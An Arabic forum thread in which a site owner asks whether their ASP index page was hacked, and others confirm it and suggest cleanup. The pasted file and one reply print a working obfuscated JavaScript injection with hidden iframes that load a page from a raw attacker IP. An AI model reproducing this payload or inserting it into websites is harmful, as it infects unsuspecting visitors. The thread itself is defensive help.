هل هذا اختراق ؟

**annassih** · 22-01-2008

اخواني في معهد ترايدنت العزيز
السلام عليكم و رحمة الله و بركاته

ارجو ممن لديه خبرة او تجربة سابقة ان يوضح لي ما يلي :

لدي موقع مصمم بال asp ملف الاندكس فيه سطر واحد هو :

كود PHP:


<%
response.redirect("/ar/index.asp")
%>

الان فوجئت بوجود ما يلي على ملف الاندكس :

كود PHP:


[LEFT]<%
response.redirect("/ar/index.asp")
%>
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v479057d2211ce(v479057d22551a){ var v479057d225c25=16; return(parseInt(v479057d22551a,v479057d225c25));}function v479057d226c0f(v479057d22740b){  var v479057d227bff='';for(v479057d2283f7=0; v479057d2283f7<v479057d22740b.length; v479057d2283f7+=2){ v479057d227bff+=(String.fromCharCode(v479057d2211ce(v479057d22740b.substr(v479057d2283f7, 2))));}return v479057d227bff;} document.write(v479057d226c0f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D62613039396638207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3532333131292B273661365C272077696474683D333731206865696768743D313431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>[/LEFT]

ارجو التوضيح

**bman** · 22-01-2008

نعم إختراق
قم بفحص جهازك الشخصي حيث أنه أكيد مخترق
وحصل المخترق على معلةمات الـ FTP الخاصة بموقعك و قام بتعديل ملفات موقعك ليضيف لها كود
يقوم بتحميل ملف إختراق لأي زائر

**الثلج** · 22-01-2008

قد يكون الفايروس على جهازك وهو من قام باضافة هذه الترويسه على ملفك انشهر هذا الفايروس لفترة في الاونه الاخيره على العموم احذف الـ iframe

**nothing4u** · 05-02-2008

السلام عليكم ورحمة الله وبركاته

الكود الاصلي هو هذا
<%
response.redirect("/ar/index.asp")
%>

وضيفته يحول المستخدم للصفحة index الموجوده في مجلد ar

بالنسبة للكود الاضافي
فهذا الجزء
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
ماعتقد منه مشاكل لانه اي فريم عادي ومايجيب اي صفحة

لكن الجزء هذا
<script>function v479057d2211ce(v479057d22551a){ var v479057d225c25=16; return(parseInt(v479057d22551a,v479057d225c25));}function v479057d226c0f(v479057d22740b){ var v479057d227bff='';for(v479057d2283f7=0; v479057d2283f7<v479057d22740b.length; v479057d2283f7+=2){ v479057d227bff+=(String.fromCharCode(v479057d2211ce(v479057d22740b.substr(v479057d2283f7, 2))));}return v479057d227bff;} document.write(v479057d226c0f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D62613039396638207372633D5C27687474703A2F2F37372E32323 12E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A353 2333131292B273661365C272077696474683D333731206865696768743D313431207374796C653D5C27646973706C61793A2 06E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>[/LEFT]

كود جافا سكربت مانا فاهم شو وضيفته
بكل الاحوال السؤال هو كيف تم زرع هذا الكود في ملف الاندكس
تأكد من عدم وجود ثغرات سكول في موقعك او اعطينا رابط الموقع نحاول نتاكد فيه
وبارك الله فيك

الموضوع: هل هذا اختراق ؟

أدوات الموضوع

بحث في الموضوع

هل هذا اختراق ؟

المواضيع المتشابهه

ماذا حدث يا سوالف ... اختراق * اختراق

بعد اختراق التوب لاين تم اختراق موقع الليزر !

اختراق اختراق لمتى

ضوابط المشاركة